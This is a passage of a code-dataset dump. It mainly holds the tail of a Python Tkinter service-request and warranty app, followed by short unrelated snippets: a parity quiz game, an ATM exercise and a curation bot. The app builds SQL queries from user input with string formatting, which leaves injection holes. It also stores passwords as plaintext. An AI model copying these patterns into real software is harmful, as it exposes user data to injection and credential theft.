getInventoryRow(ele[0]) #ele[0] -> purchase_id\n myInventoryTable.insert(\"\",\"end\",text=str(ele), values=tup)\n myInventoryTable.place(relheight = 0.9, relwidth = 1, rely = 0.1)\n inventoryFrame.place(relx = 0.55, rely = 0.05, relwidth = 0.4, relheight = 0.32)\n \n myInventoryTable.bind(\"\", select_record)\n\n\n # Init\n requestPage.place(relwidth = 1, relheight = 1)\n selectionFrame.place(relx = 0.05, rely = 0.05, relwidth = 0.45)\n buttonsFrame.place(relx = 0.05, rely = 0.2, relwidth = 0.45)\n requestFormFrame.place(relx = 0.05, rely = 0.3, relwidth = 0.45)\n displayTable()\n\n\ndef requestForm(itemID, person):\n\n # variables\n userID = person[0]\n request_status = [\n \"Submitted\",\n \"Submitted and Waiting for payment\",\n \"In progress\",\n \"Approved\",\n \"Canceled\",\n \"Completed\",\n ]\n\n # Functions\n def itemExistsValidation(itemID):\n query_string = f\"SELECT * FROM Purchase INNER JOIN Item USING(purchaseID) WHERE customerID = {userID} AND itemID = '{itemID}'\"\n res = readQuery(connection, query_string)\n return len(res) != 0\n\n def itemHasNoPendingRequestValidation(itemID):\n query_string = f\"SELECT * FROM Request WHERE requestStatus \\\n IN ('Submitted', 'Submitted and Waiting for payment', 'In progress', 'Approved') AND itemID='{itemID}'\"\n res = readQuery(connection, query_string)\n return len(res) == 0\n\n def getRequestStatus(itemID):\n requires_payment = requestRequiresPaymentValidation(itemID)\n if requires_payment:\n return request_status[1]\n else:\n return request_status[0]\n\n def getAdminWithLeastRequests():\n query_string = (\n f\"SELECT adminID, COUNT(adminID) FROM Administrator LEFT JOIN Request USING(adminID) GROUP BY adminID ORDER BY COUNT(adminID)\"\n )\n res = readQuery(connection, query_string)[0][0]\n return res\n\n def getNumOfRequests():\n query_string = \"SELECT COUNT(*) FROM Request\"\n res = readQuery(connection, query_string)[0][0]\n return res\n\n def commitData():\n print(itemID, userID)\n try:\n if not itemExistsValidation(itemID):\n return messagebox.showerror(\n title=\"Error\", message=\"Item does not exist or belong to user\"\n )\n \n elif not itemHasNoPendingRequestValidation(itemID):\n return messagebox.showerror(\n title=\"Error\", message=\"Item has a pending request\"\n )\n\n else:\n requestDate = date.today().strftime(\"%Y-%m-%d\")\n requestFee = (\n 0\n if not requestRequiresPaymentValidation(itemID)\n else getRequestFee(itemID)\n )\n requestStatus = getRequestStatus(itemID)\n adminID = getAdminWithLeastRequests()\n requestID = getNumOfRequests() + 1\n\n query_string = f\"INSERT INTO Request VALUES ({requestID}, {requestFee},'{requestDate}','{requestStatus}',{userID},{adminID},'{itemID}')\"\n executeQuery(connection, query_string)\n\n collectionItem.find_one_and_update({\"ItemID\":{\"$eq\":itemID}}, {\n \"$set\":{\"ServiceStatus\": \"Waiting for approval\"}\n })\n return messagebox.showinfo(\n title=\"success\", message=f\"Request Submitted!\"\n )\n\n except exception as e:\n print(e)\n return messagebox.showerror(title=\"Error\", message=\"System Error\")\n\n # init\n commitData()\n\ndef requestRequiresPaymentValidation(itemID):\n def getEndDate(warranty, purchase_date):\n end_date = purchase_date + relativedelta(months=int(warranty))\n return end_date\n\n query_string_product_warranty = f\"SELECT warranty FROM Product WHERE productID = (SELECT productID FROM Item WHERE itemID = '{itemID}')\"\n query_string_purchase_date = f\"SELECT purchaseDate FROM Purchase INNER JOIN Item ON Purchase.purchaseID = Item.purchaseID WHERE itemID = '{itemID}'\"\n res1 = readQuery(connection, query_string_product_warranty)[0][0]\n res2 = readQuery(connection, query_string_purchase_date)[0][0]\n end_date = getEndDate(res1, res2)\n return end_date < date.today()\n\ndef getRequestFee(itemID):\n FLAT_FEE = 40\n RATE = 0.2\n\n query_string = f\"SELECT price FROM Product INNER JOIN Item USING(productID) WHERE itemID = '{itemID}'\"\n res = readQuery(connection, query_string)[0][0]\n\n return FLAT_FEE + RATE * res\n\n\n#################################################################################\n# 5. Service Management Page (Admin)\n#################################################################################\ndef serviceManagement(person):\n global requestListFrame\n global SELECTED_ROWS\n\n # Frames\n requestPage = Frame(root)\n requestListFrame = Frame(\n requestPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n\n selectionFrame = LabelFrame(requestPage, text=\"Record\")\n buttonsFrame = LabelFrame(\n requestPage,\n text=\"Options\",\n highlightbackground=\"black\",\n highlightthickness=1,\n bg=\"grey\",\n )\n requestFormFrame = LabelFrame(\n requestPage,\n text=\"New Request\",\n highlightbackground=\"black\",\n highlightthickness=1,\n )\n\n # Labels\n serviceLabel = Label(\n requestPage, text=f\"Service Management\", bg=\"violet\", relief=SUNKEN\n )\n serviceLabel.place(relwidth = 1, relheight = 0.05)\n\n # Entries\n attrLabel0 = Label(selectionFrame, text=\"ID\")\n attrLabel0.grid(row=0, column=0, padx=10, pady=10)\n attrEntry0 = Entry(selectionFrame)\n attrEntry0.grid(row=0, column=1, padx=10, pady=10)\n\n attrLabel1 = Label(selectionFrame, text=\"Fee ($)\")\n attrLabel1.grid(row=0, column=2, padx=10, pady=10)\n attrEntry1 = Entry(selectionFrame)\n attrEntry1.grid(row=0, column=3, padx=10, pady=10)\n\n attrLabel2 = Label(selectionFrame, text=\"Date\")\n attrLabel2.grid(row=0, column=4, padx=10, pady=10)\n attrEntry2 = Entry(selectionFrame)\n attrEntry2.grid(row=0, column=5, padx=10, pady=10)\n\n attrLabel3 = Label(selectionFrame, text=\"Status\")\n attrLabel3.grid(row=1, column=0, padx=10, pady=10)\n attrEntry3 = Entry(selectionFrame)\n attrEntry3.grid(row=1, column=1, padx=10, pady=10)\n\n attrLabel4 = Label(selectionFrame, text=\"Item ID\")\n attrLabel4.grid(row=1, column=2, padx=10, pady=10)\n attrEntry4 = Entry(selectionFrame)\n attrEntry4.grid(row=1, column=3, padx=10, pady=10)\n\n # Variables\n adminID = person[0]\n SELECTED_ROWS = []\n\n # Helpers\n\n def displayTable():\n requests = getAdminRequests(adminID)\n # requests = [{\"ID\":1,\"Fee ($)\":200.0,\"Date\":\"31/12\",\"Status\":\"no\",\"Item ID\":2}]\n createTable(requests)\n\n def createTable(requests):\n global requestListFrame\n global SELECTED_ROWS\n SELECTED_ROWS = []\n requestListFrame.destroy()\n requestListFrame = Frame(\n requestPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n requestListFrame.place(relx = 0.05, rely = 0.4, relwidth = 0.9, relheight = 0.55)\n\n columnNames = (\"ID\", \"Fee ($)\", \"Date\", \"Status\", \"Item ID\")\n tableScroll = Scrollbar(requestListFrame)\n tableScroll.pack(side=RIGHT, fill=Y)\n table = ttk.Treeview(\n requestListFrame,\n yscrollcommand=tableScroll.set,\n column=columnNames,\n show=\"headings\",\n selectmode=\"extended\",\n )\n table.place(relwidth = 1, relheight = 1)\n tableScroll.config(command=table.yview)\n for name in columnNames:\n table.heading(name, text=name, anchor=CENTER)\n if requests:\n for r in requests:\n toInsert = (r[0], r[1], r[2], r[3], int(r[4]))\n table.insert(\"\", \"end\", text=str(r), values=toInsert)\n\n # Function\n def select_record(e):\n global SELECTED_ROWS\n # delete current entry boxes\n clearEntries()\n SELECTED_ROWS = []\n selected = table.focus()\n attrs = table.item(selected)[\"values\"]\n\n attrEntry0.insert(0, attrs[0])\n attrEntry1.insert(0, attrs[1])\n attrEntry2.insert(0, attrs[2])\n attrEntry3.insert(0, attrs[3])\n attrEntry4.insert(0, attrs[4])\n\n def select_records(e):\n global SELECTED_ROWS\n # delete current entry boxes\n clearEntries()\n selected = table.selection()\n\n # display values for first row\n attrs = table.item(selected[0])[\"values\"]\n attrEntry0.insert(0, attrs[0])\n attrEntry1.insert(0, attrs[1])\n attrEntry2.insert(0, attrs[2])\n attrEntry3.insert(0, attrs[3])\n attrEntry4.insert(0, attrs[4])\n\n SELECTED_ROWS = [table.item(ele)[\"values\"] for ele in selected]\n\n # Event\n table.bind(\"\", select_record)\n table.bind(\"\", select_records)\n\n def goHome():\n requestPage.destroy()\n adminHome(person)\n\n def getAdminRequests(userID):\n query_string = f\"SELECT requestID, requestFee, requestDate, requestStatus, itemID FROM Request WHERE adminID = {adminID}\"\n return readQuery(connection, query_string)\n\n def clearEntries():\n # clear entry boxes\n attrEntry0.delete(0, END)\n attrEntry1.delete(0, END)\n attrEntry2.delete(0, END)\n attrEntry3.delete(0, END)\n attrEntry4.delete(0, END)\n\n def getServiceStatus(itemID):\n query_string = f\"SELECT serviceStatus FROM Item WHERE itemID={itemID}\"\n return readQuery(connection, query_string)[0][0]\n\n def approveRequest():\n try:\n if SELECTED_ROWS == []: # only one entry\n requestID = attrEntry0.get()\n requestStatus = attrEntry3.get()\n itemID = attrEntry4.get()\n if requestStatus == \"In progress\" or requestStatus == \"Submitted\":\n response = messagebox.askokcancel(\n \"Approve Request\", message=f\"Approve request #{requestID}?\"\n )\n if response:\n query_string_1 = f\"UPDATE Request SET requestStatus='Approved' WHERE requestID = {requestID}\"\n query_string_2 = f\"UPDATE Item SET serviceStatus='In progress' WHERE itemID = {itemID}\"\n executeQuery(connection, query_string_1)\n executeQuery(connection, query_string_2)\n\n collectionItem.find_one_and_update({\"ItemID\": {\"$eq\":itemID}}, {\n \"$set\":{\"ServiceStatus\": \"In progress\"}\n })\n\n clearEntries()\n displayTable()\n\n else:\n return messagebox.showerror(\n title=\"Error\", message=\"Request cannot be approved\"\n )\n else:\n\n setOfRequestStatus = set([ele[3] for ele in SELECTED_ROWS])\n IDs = tuple(ele[0] for ele in SELECTED_ROWS)\n itemIDs = tuple(str(ele[4]) for ele in SELECTED_ROWS)\n \n #print(setOfRequestStatus)\n #print(IDs)\n #print(itemIDs)\n\n if setOfRequestStatus.issubset({\"In progresss\", \"Submitted\"}):\n response = messagebox.askokcancel(\n \"Approve Requests\",\n message=f\"Approve ({len(SELECTED_ROWS)}) selected requests?\",\n )\n if response:\n query_string_1 = f\"UPDATE Request SET requestStatus='Approved' WHERE requestID IN {IDs}\"\n query_string_2 = f\"UPDATE Item SET serviceStatus='In progress' WHERE itemID IN {itemIDs}\"\n executeQuery(connection, query_string_1)\n executeQuery(connection, query_string_2)\n\n collectionItem.update_many({\"ItemID\":{\"$in\":list(itemIDs)}},{\n \"$set\":{\"ServiceStatus\": \"In progress\"}\n } )\n\n clearEntries()\n displayTable()\n else:\n return messagebox.showerror(\n title=\"Error\", message=\"Requests cannot be approved\"\n )\n\n except:\n return messagebox.showerror(title=\"Error\", message=\"An error has occurred\")\n\n def serviceRequest():\n try:\n if SELECTED_ROWS == []: # only one entry\n requestID = attrEntry0.get()\n requestStatus = attrEntry3.get()\n itemID = attrEntry4.get()\n if (\n requestStatus == \"Approved\"\n and getServiceStatus(itemID) == \"In progress\"\n ):\n response = messagebox.askokcancel(\n \"Service Request\", message=f\"Service request #{requestID}?\"\n )\n if response:\n query_string_1 = f\"UPDATE Request SET requestStatus='Completed' WHERE requestID = {requestID}\"\n query_string_2 = f\"UPDATE Item SET serviceStatus='Completed' WHERE itemID = {itemID}\"\n executeQuery(connection, query_string_1)\n executeQuery(connection, query_string_2)\n\n collectionItem.update_many({\"ItemID\":{\"$eq\":itemID}},{\n \"$set\":{\"ServiceStatus\": \"Completed\"}\n } )\n\n clearEntries()\n displayTable()\n\n else:\n return messagebox.showerror(\n title=\"Error\", message=\"Request cannot be serviced\"\n )\n else:\n setOfRequestStatus = set([ele[3] for ele in SELECTED_ROWS])\n IDs = tuple(ele[0] for ele in SELECTED_ROWS)\n itemIDs = tuple(str(ele[4]) for ele in SELECTED_ROWS)\n setOfServiceStatus = set([getServiceStatus(id) for id in itemIDs])\n\n if setOfRequestStatus == {\"Approved\"} and setOfServiceStatus == {\n \"In progress\"\n }:\n response = messagebox.askokcancel(\n \"Service Requests\",\n message=f\"Service ({len(SELECTED_ROWS)}) selected requests?\",\n )\n if response:\n query_string_1 = f\"UPDATE Request SET requestStatus='Completed' WHERE requestID IN {IDs}\"\n query_string_2 = f\"UPDATE Item SET serviceStatus='Completed' WHERE itemID IN {itemIDs}\"\n executeQuery(connection, query_string_1)\n executeQuery(connection, query_string_2)\n\n collectionItem.update_many({\"ItemID\":{\"$in\":list(itemIDs)}},{\n \"$set\":{\"ServiceStatus\": \"Completed\"}\n } )\n\n clearEntries()\n displayTable()\n else:\n return messagebox.showerror(\n title=\"Error\", message=\"Requests cannot be serviced\"\n )\n\n except:\n return messagebox.showerror(\n title=\"Error\", message=\"Service cannot be completed\"\n )\n\n def viewItem():\n try:\n itemID = attrEntry4.get()\n return goToItem(person, itemID, True)\n except:\n return messagebox.showerror(title=\"Error\", message=\"Invalid Item ID\")\n\n def detailStats():\n requestPage.destroy()\n goToDetails(person)\n\n # Buttons\n\n displayButton = Button(\n buttonsFrame, text=\"Display/Refresh Table\", command=displayTable, bg=\"white\"\n )\n displayButton.grid(row=0, column=0, padx=10, pady=10)\n\n homeButton = Button(buttonsFrame, text=\"Return to Home\", command=goHome, bg=\"blue\")\n homeButton.grid(row=0, column=1, padx=10, pady=10)\n\n viewItemButton = Button(buttonsFrame, text=\"View Item\", command=viewItem, bg=\"blue\")\n viewItemButton.grid(row=0, column=2, padx=10, pady=10)\n\n approveRequestButton = Button(\n buttonsFrame, text=\"Approve Request(s)\", command=approveRequest, bg=\"green\"\n )\n approveRequestButton.grid(row=0, column=3, padx=10, pady=10)\n\n serviceRequestButton = Button(\n buttonsFrame, text=\"Service Request(s)\", command=serviceRequest, bg=\"green\"\n )\n serviceRequestButton.grid(row=0, column=4, padx=10, pady=10)\n\n allDetailsButton = Button(buttonsFrame, text=\"Administrator Functions\",\n command=detailStats, bg=\"pink\")\n allDetailsButton.grid(row=0, column=5, padx=10, pady=10)\n\n # Init\n requestPage.place(relwidth = 1, relheight = 1)\n selectionFrame.place(relx = 0.05, rely = 0.05, relwidth = 0.60)\n buttonsFrame.place(relx = 0.05, rely = 0.2, relwidth = 0.60)\n requestFormFrame.place(relx = 0.05, rely = 0.3, relwidth = 0.45)\n displayTable()\n\n#################################################################################\n# 5.1 Details and Delinquents Page\n#################################################################################\ndef goToDetails(person):\n detailsPage = Frame(root)\n\n # Labels\n titleLabel = Label(detailsPage, text = \"Request Summary and Delinquents\", relief = SUNKEN, bg = 'violet')\n titleLabel.place(relwidth = 1, relheight = 0.05)\n\n delinquentLabel = Label(detailsPage, text = \"Delinquent Customers\", relief = SUNKEN, bg = \"orange\")\n delinquentLabel.place(relwidth = 0.5, relheight = 0.05, rely = 0.05)\n\n detailsLabel = Label(detailsPage, text = \"All Incomplete Service Requests\", relief = SUNKEN, bg = \"Yellow\")\n detailsLabel.place(relwidth=0.5, relheight=0.05, rely=0.05, relx = 0.5)\n\n # Delinquent Table\n delinquentFrame = Frame(detailsPage, highlightbackground = 'black', highlightthickness = 1)\n detailNames = ['customerID', 'Name', 'requestID', 'requestFee']\n dqTable = ttk.Treeview(delinquentFrame, column=detailNames, show=\"headings\", height=5)\n for name in detailNames:\n dqTable.heading(name, text=name, anchor=CENTER)\n dqTable.column(name, anchor=CENTER, stretch=NO, width=170)\n test_query = \"SELECT * FROM Request WHERE requestStatus = 'Submitted and Waiting for payment'\"\n results = readQuery(connection, test_query)\n if len(results) != 0:\n for item in results:\n test_query2 = \"SELECT * FROM Customer WHERE customerID = '%s' \" % (item[4])\n mydetails = readQuery(connection, test_query2)[0]\n customerName = mydetails[1]\n dqTable.insert(\"\",\"end\",text=str(item), values=(int(item[4]),customerName, item[0],item[1]))\n dqTable.place(relheight = 1, relwidth = 1)\n delinquentFrame.place(rely = 0.1, relwidth = 0.5, relheight = 0.8)\n\n # Service Request Table\n serviceFrame = Frame(detailsPage, highlightbackground = 'black', highlightthickness = 1)\n serviceName = ['requestID', 'requestStatus']\n servTable = ttk.Treeview(serviceFrame, column=serviceName, show=\"headings\", height=5)\n for name in serviceName:\n servTable.heading(name, text=name, anchor=CENTER)\n servTable.column(name, anchor=CENTER, stretch=NO, width=350)\n test_query = \"SELECT * FROM Request WHERE requestStatus NOT IN ('Canceled', 'Completed')\"\n results = readQuery(connection, test_query)\n if len(results) != 0:\n for item in results:\n servTable.insert(\"\",\"end\",text=str(item), values=(item[0], item[3]))\n servTable.place(relheight = 1, relwidth = 1)\n serviceFrame.place(rely = 0.1, relx = 0.5, relwidth = 0.5, relheight = 0.8)\n\n # Functions\n def back():\n detailsPage.destroy()\n serviceManagement(person)\n\n # Buttons\n backButton = Button(detailsPage, text = \"Back to Service Management\", bg = \"blue\", command = back, fg = \"white\")\n backButton.place(relx = 0.05, rely = 0.95)\n\n # Initialise\n detailsPage.place(relwidth = 1, relheight = 1)\n\n#################################################################################\n# 6. Sign up Page\n#################################################################################\ndef goToSignUp():\n signUpPage = Frame(root, bg=\"grey\")\n\n # Labels\n signUpLabel = Label(signUpPage, text=\"New User Page\", bg=\"lightblue\", relief=SUNKEN)\n signUpLabel2 = Label(signUpPage, text=\"Please select the user type:\")\n\n signUpLabel.place(relwidth=1, relheight=0.05)\n signUpLabel2.place(relwidth=1, relheight=0.05, rely=0.05)\n\n # Functions\n def transitionPages(state):\n signUpPage.destroy()\n if state == \"admin\":\n adminForm()\n elif state == \"user\":\n userForm()\n else:\n goToLogin()\n\n # Buttons\n userButton = Button(\n signUpPage,\n text=\"User Sign-up\",\n width=50,\n command=lambda: transitionPages(\"user\"),\n bg=\"green\",\n )\n adminButton = Button(\n signUpPage,\n text=\"Admin Sign-up\",\n width=50,\n command=lambda: transitionPages(\"admin\"),\n bg=\"green\",\n )\n goBackButton = Button(\n signUpPage,\n text=\"Return to Sign-in\",\n width=50,\n command=lambda: transitionPages(\"\"),\n bg=\"blue\",\n )\n\n userButton.place(relx=0.38, rely=0.2)\n adminButton.place(relx=0.38, rely=0.3)\n goBackButton.place(relx=0.38, rely=0.6)\n\n # Initialise\n signUpPage.place(relwidth=1, relheight=1)\n\n\ndef userForm():\n formPage = Frame(root, bg=\"grey\")\n\n # Labels\n title = Label(formPage, text=\"User Sign Up\", relief=SUNKEN, bg=\"lightblue\")\n\n formLabel0 = Label(formPage, text=\"Set User ID: \")\n formLabel1 = Label(formPage, text=\"Name: \")\n formLabel2 = Label(formPage, text=\"Email: \")\n formLabel3 = Label(formPage, text=\"Phone: \")\n formLabel4 = Label(formPage, text=\"Address: \")\n formLabel5 = Label(formPage, text=\"Password: \")\n formLabel6 = Label(formPage, text=\"Gender: \")\n\n title.place(relwidth=1, relheight=0.05)\n formLabel0.place(relx=0.2, rely=0.3)\n formLabel1.place(relx=0.2, rely=0.35)\n formLabel2.place(relx=0.2, rely=0.4)\n formLabel3.place(relx=0.2, rely=0.45)\n formLabel4.place(relx=0.2, rely=0.5)\n formLabel5.place(relx=0.2, rely=0.55)\n formLabel6.place(relx=0.2, rely=0.6)\n\n # Functions\n def renewFields():\n formPage.destroy()\n userForm()\n\n def commitData():\n try:\n customerId = customerIdField.get()\n name = nameField.get()\n emailAddress = emailAddressField.get()\n phoneNumber = phoneNumberField.get()\n address = addressField.get()\n password = passwordField.get()\n gender = genderField.get()\n except:\n return messagebox.showerror(title=\"Error\", message=\"Invalid type/Input\")\n\n if customerId == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"Customer ID cannot be empty\"\n )\n if name == \"\":\n return messagebox.showerror(title=\"Error\", message=\"Name cannot be empty\")\n if emailAddress == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"Email address cannot be empty\"\n )\n if phoneNumber == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"phoneNumber cannot be empty\"\n )\n if address == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"Address cannot be empty\"\n )\n if password == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"Password cannot be empty\"\n )\n\n test_query = \"SELECT * FROM Customer WHERE customerID = '%s' \" % (customerId)\n results = readQuery(connection, test_query)\n\n if len(results) == 0:\n sql_query = (\n \"INSERT INTO Customer VALUES ('%s', '%s','%s','%s', '%s','%s','%s')\"\n % (\n customerId,\n name,\n gender,\n emailAddress,\n phoneNumber,\n address,\n password,\n )\n )\n test = executeQuery(connection, sql_query)\n if test:\n return messagebox.showinfo(\n title=\"success\", message=\"Registration successful!\"\n )\n else:\n return messagebox.showerror(\n title=\"Error\",\n message=\"Commit Error, some data may be invalid\",\n )\n else:\n return messagebox.showerror(\n title=\"Error\",\n message=\"There is an existing customer ID, please use another ID\",\n )\n\n def cancelForm():\n formPage.destroy()\n goToSignUp()\n\n # Fields\n customerId = IntVar()\n customerIdField = Entry(formPage, textvariable=customerId, width=50)\n test_query = \"SELECT MAX(customerID) FROM Customer\"\n value = int(readQuery(connection, test_query)[0][0]) + 1\n customerIdField.delete(0, END)\n customerIdField.insert(0, value)\n customerIdField.place(relx=0.3, rely=0.3)\n\n name = StringVar()\n nameField = Entry(formPage, textvariable=name, width=50)\n nameField.place(relx=0.3, rely=0.35)\n\n emailAddress = StringVar()\n emailAddressField = Entry(formPage, textvariable=emailAddress, width=50)\n emailAddressField.place(relx=0.3, rely=0.4)\n\n phoneNumber = StringVar()\n phoneNumberField = Entry(formPage, textvariable=phoneNumber, width=50)\n phoneNumberField.place(relx=0.3, rely=0.45)\n\n address = StringVar()\n addressField = Entry(formPage, textvariable=address, width=50)\n addressField.place(relx=0.3, rely=0.5)\n\n password = StringVar()\n passwordField = Entry(formPage, textvariable=password, width=50)\n passwordField.place(relx=0.3, rely=0.55)\n\n # Buttons\n commitButton = Button(\n formPage, text=\"Confirm Details\", width=50, command=commitData, bg=\"green\"\n )\n resetButton = Button(\n formPage, text=\"Clear all fields\", width=50, command=renewFields, bg=\"white\"\n )\n cancelButton = Button(\n formPage,\n text=\"Return to User type Selection\",\n width=50,\n command=cancelForm,\n bg=\"red\",\n )\n\n commitButton.place(relx=0.3, rely=0.7)\n resetButton.place(relx=0.3, rely=0.75)\n cancelButton.place(relx=0.3, rely=0.8)\n\n genderField = StringVar()\n MaleButton = Radiobutton(\n formPage,\n text=\"Male\",\n padx=20,\n variable=genderField,\n value=\"Male\",\n font=(\"Mincho\", 20),\n )\n FemaleButton = Radiobutton(\n formPage,\n text=\"Female\",\n padx=20,\n variable=genderField,\n value=\"Female\",\n font=(\"Mincho\", 20),\n )\n\n MaleButton.place(relx=0.3, rely=0.6)\n FemaleButton.place(relx=0.4, rely=0.6)\n\n # Initialise\n formPage.place(relwidth=1, relheight=1)\n\n\ndef adminForm():\n formPage = Frame(root, bg=\"grey\")\n\n # Labels\n title = Label(formPage, text=\"User Sign Up\", relief=SUNKEN, bg=\"lightblue\")\n\n formLabel0 = Label(formPage, text=\"Set Admin ID: \")\n formLabel1 = Label(formPage, text=\"Name: \")\n formLabel2 = Label(formPage, text=\"Phone: \")\n formLabel3 = Label(formPage, text=\"Set Password: \")\n formLabel4 = Label(formPage, text=\"Gender: \")\n\n title.place(relwidth=1, relheight=0.05)\n formLabel0.place(relx=0.2, rely=0.3)\n formLabel1.place(relx=0.2, rely=0.35)\n formLabel2.place(relx=0.2, rely=0.4)\n formLabel3.place(relx=0.2, rely=0.45)\n formLabel4.place(relx=0.2, rely=0.5)\n\n # Functions\n def renewFields():\n formPage.destroy()\n adminForm()\n\n def commitData():\n try:\n administratorId = administratorIdField.get()\n name = nameField.get()\n phoneNumber = phoneNumberField.get()\n password = passwordField.get()\n gender = genderField.get()\n except:\n return messagebox.showerror(title=\"Error\", message=\"Invalid type/Input\")\n\n if administratorId == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"administrator ID cannot be empty\"\n )\n if name == \"\":\n return messagebox.showerror(title=\"Error\", message=\"Name cannot be empty\")\n if phoneNumber == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"phoneNumber cannot be empty\"\n )\n if password == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"Password cannot be empty\"\n )\n\n test_query = \"SELECT * FROM Administrator WHERE adminID = '%s' \" % (\n administratorId\n )\n results = readQuery(connection, test_query)\n\n if len(results) == 0:\n sql_query = (\n \"INSERT INTO Administrator VALUES ('%s','%s','%s','%s', '%s')\"\n % (administratorId, name, gender, phoneNumber, password)\n )\n test = executeQuery(connection, sql_query)\n if test:\n return messagebox.showinfo(\n title=\"success\", message=\"Registration successful!\"\n )\n else:\n return messagebox.showerror(\n title=\"Error\",\n message=\"Commit Error, some data may be invalid\",\n )\n else:\n return messagebox.showerror(\n title=\"Error\",\n message=\"There is an existing administrator ID, please use another ID\",\n )\n\n def cancelForm():\n formPage.destroy()\n goToSignUp()\n\n # Fields\n administratorId = IntVar()\n administratorIdField = Entry(formPage, textvariable=administratorId, width=50)\n test_query = \"SELECT MAX(adminID) FROM Administrator\"\n value = int(readQuery(connection, test_query)[0][0]) + 1\n administratorIdField.delete(0, END)\n administratorIdField.insert(0, value)\n administratorIdField.place(relx=0.3, rely=0.3)\n\n name = StringVar()\n nameField = Entry(formPage, textvariable=name, width=50)\n nameField.place(relx=0.3, rely=0.35)\n\n phoneNumber = StringVar()\n phoneNumberField = Entry(formPage, textvariable=phoneNumber, width=50)\n phoneNumberField.place(relx=0.3, rely=0.4)\n\n password = StringVar()\n passwordField = Entry(formPage, textvariable=password, width=50)\n passwordField.place(relx=0.3, rely=0.45)\n # Buttons\n commitButton = Button(\n formPage, text=\"Confirm Details\", width=50, command=commitData, bg=\"green\"\n )\n resetButton = Button(\n formPage, text=\"Clear all fields\", width=50, command=renewFields, bg=\"white\"\n )\n cancelButton = Button(\n formPage,\n text=\"Return to User type Selection\",\n width=50,\n command=cancelForm,\n bg=\"red\",\n )\n\n commitButton.place(relx=0.3, rely=0.7)\n resetButton.place(relx=0.3, rely=0.75)\n cancelButton.place(relx=0.3, rely=0.8)\n\n genderField = StringVar()\n MaleButton = Radiobutton(\n formPage,\n text=\"Male\",\n padx=20,\n variable=genderField,\n value=\"Male\",\n font=(\"Mincho\", 20),\n )\n FemaleButton = Radiobutton(\n formPage,\n text=\"Female\",\n padx=20,\n variable=genderField,\n value=\"Female\",\n font=(\"Mincho\", 20),\n )\n\n MaleButton.place(relx=0.3, rely=0.5)\n FemaleButton.place(relx=0.4, rely=0.5)\n\n # Initialise\n formPage.place(relwidth=1, relheight=1)\n\ndef updateRequestTable():\n #cancel requests with payment fee after more than 10 days\n today = date.today().strftime(\"%Y-%m-%d\")\n query_string_1 = f\"UPDATE Request SET requestStatus='Canceled' WHERE requestFee > 0 AND requestStatus='Submitted and Waiting for payment' AND DATE_ADD(requestDate, INTERVAL 10 DAY) < '{today}'\"\n executeQuery(connection,query_string_1)\n\n query_string_2 = f\"SELECT itemID FROM Request WHERE requestStatus='Canceled'\"\n itemIDs = readQuery(connection, query_string_2)\n\n for i in itemIDs:\n query_string_3 = f\"UPDATE Item SET serviceStatus='' WHERE itemID='{i[0]}'\"\n executeQuery(connection,query_string_3)\n collectionItem.find_one_and_update({\"ItemID\":{\"$eq\":i[0]}},{\"$set\": {\"ServiceStatus\": \"\"}})\n\n print(\"Request table updated\")\n\n\n\n#################################################################################\n# Execute Program\nupdateRequestTable()\ngoToLogin()\nroot.mainloop()\n","repo_name":"aaronthamsc98/OSHES","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":104258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5330854435","text":"import prompt\nimport random\n\n\ndef run():\n name = prompt.string('May I have your name? ')\n print(\"Hello, \" + name + \"!\")\n count = 0\n while count < 3:\n rand = random.randint(1, 99)\n print(\"Question: \" + str(rand))\n answer = prompt.string('Your answer: ')\n flag = rand % 2\n if flag:\n if answer == 'no':\n print('Correct!')\n count += 1\n elif answer == 'yes':\n print(\"'yes' is wrong answer ;(. Correct answer was 'no'.\\nLet's try again, \" + name + \"!\")\n else:\n print(\"Incorrect answer. Please answer 'yes' or 'no'\")\n else:\n if answer == 'yes':\n print('Correct!')\n count += 1\n elif answer == 'no':\n print(\"'no' is wrong answer ;(. Correct answer was 'yes'.\\nLet's try again, \" + name + \"!\")\n else:\n print(\"Incorrect answer. Please answer 'yes' or 'no'\")\n print(\"Congratulations, \" + name + \"!\")\n","repo_name":"sudo-ford/python-project-lvl1_1","sub_path":"brain_games/brain_even.py","file_name":"brain_even.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28760253933","text":"#!/usr/bin/env python\r\n#-*- coding: utf-8 -*-\r\n# author:zhangjiao\r\nfrom day13.银行系统.atm import ATM\r\nimport time\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ATM.welcome()\r\n userDict={}\r\n while True:\r\n print(userDict)\r\n time.sleep(1)\r\n num = ATM.select()\r\n if num == \"2\":\r\n print(\"开户\")\r\n ATM.kaihu(userDict)\r\n elif num == \"1\":\r\n print(\"登陆\")\r\n login = ATM.login()\r\n\r\n","repo_name":"WayneChen1994/Python1805","sub_path":"day13/银行系统/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21426343002","text":"import logging\n\nimport arrow\n\nfrom bots.autocuratetag.tasks import CurateItemTask\nfrom share.bot import Bot\nfrom share.models import CeleryProviderTask\n\nfrom share.models import Tag\n\nlogger = logging.getLogger(__name__)\n\n\nclass AutoCurateBot(Bot):\n\n def run(self, last_run, dry=False):\n if not last_run:\n logger.debug('Finding last successful job')\n last_run = CeleryProviderTask.objects.filter(\n app_label=self.config.label,\n status=CeleryProviderTask.STATUS.succeeded,\n ).order_by(\n '-timestamp'\n ).values_list('timestamp', flat=True).first()\n if last_run:\n last_run = arrow.get(last_run)\n else:\n last_run = arrow.get(0)\n logger.info('Found last job %s', last_run)\n else:\n last_run = arrow.get(last_run)\n\n logger.info('Using last run of %s', last_run)\n 